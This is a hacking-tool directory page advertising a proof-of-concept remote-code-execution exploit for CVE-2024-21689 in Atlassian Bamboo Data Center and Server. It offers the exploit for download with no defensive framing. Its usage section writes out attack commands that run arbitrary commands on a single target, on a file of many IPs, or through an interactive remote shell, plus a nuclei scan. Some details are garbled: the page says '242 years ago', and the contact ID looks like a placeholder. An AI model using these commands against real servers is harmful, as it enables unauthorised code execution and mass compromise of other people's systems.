Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-21689 — CVE-2024–21689 RCE Bamboo Data Center and Server Atlassian POC | Kitploit
Tools/GitHubGitHub/salvadornakamura/cve-2024-21689
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubsalvadornakamura/cve-2024-21689

CVE-2024-21689

CVE-2024–21689 RCE Bamboo Data Center and Server Atlassian POC

View Repository
242 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

#CVE-2024–21689 RCE Bamboo Data Center and Server Atlassian

CVSS Score - 7.6 🔥

Description

This High severity RCE (Remote Code Execution) vulnerability CVE-2024-21689 was introduced in versions 9.1.0, 9.2.0, 9.3.0, 9.4.0, 9.5.0, and 9.6.0 of Bamboo Data Center and Server. This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.6, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.

Running the Script

  • Single URL Mode:
    root@kitploit:~
    python3 exploit.py -u http://<target-ip>:8090 -c "whoami"
    
  • File Mode (for multiple IPs):
    root@kitploit:~
    python3 exploit.py -f ips.txt -c "whoami"
    
  • Interactive Shell Mode:
    root@kitploit:~
    python3 exploit.py -u http://<target-ip>:8090 --shell
    
  • Nuclei:
    root@kitploit:~
    nuclei exploit.yaml -f file.txt
    

Contact

Contact me in TOX: 6FDB3C4D5E6F7G8H9I0J1K2L3M4N5O6P7Q8R9S0TQDQ2

Download Tool